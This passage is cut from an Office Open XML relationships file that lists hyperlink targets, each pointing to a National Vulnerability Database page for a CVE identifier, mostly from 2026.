Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96830" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96836" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97065" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97077" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97235" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97237" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97250" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97253" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97271" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97272" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97289" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97290" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102127" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47582" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47596" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47598" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93495" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100275" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92868" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92873" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93462" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96342" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10726" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96824" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97242" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102141" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47509" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47515" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47522" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47524" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47525" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47527" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47529" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47532" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47533" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47537" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47538" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47539" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47542" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47543" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47544" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47546" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47547" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102133" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102135" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102145" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100274" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100279" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100513" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101879" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101881" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102124" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102139" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102146" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102375" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102386" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102397" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102588" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102991" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103001" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103538" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103592" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16596" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62078" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62079" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62080" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62084" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67075" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91109" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93995" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93996" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94029" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94074" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94077" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94674" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96338" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96347" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96829" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96834" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96835" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97067" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97236" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97239" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97247" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97262" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97265" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97266" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97270" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97279" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97286" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97288" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97292" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97298" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97301" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14564" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11895" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14876" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47565" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47586" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6170" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6171" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6172" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6173" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88037" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92712" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93908" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102136" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102983" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103115" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103222" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103226" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103227" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103534" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103540" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103541" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103543" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91860" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96821" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103388" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103389" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47096" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47518" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100267" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100276" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102110" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102384" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55174" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76147" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94681" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103243" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103397" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102578" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103230" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103232" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103531" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103641" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47492" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47506" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47517" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47534" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47549" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47555" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47557" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47566" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47567" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47568" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47581" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47584" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47603" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47604" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97238" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100261" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101883" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102134" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102399" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103539" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103587" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103588" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103589" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103590" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12241" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13720" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62081" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62083" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94173" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96450" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 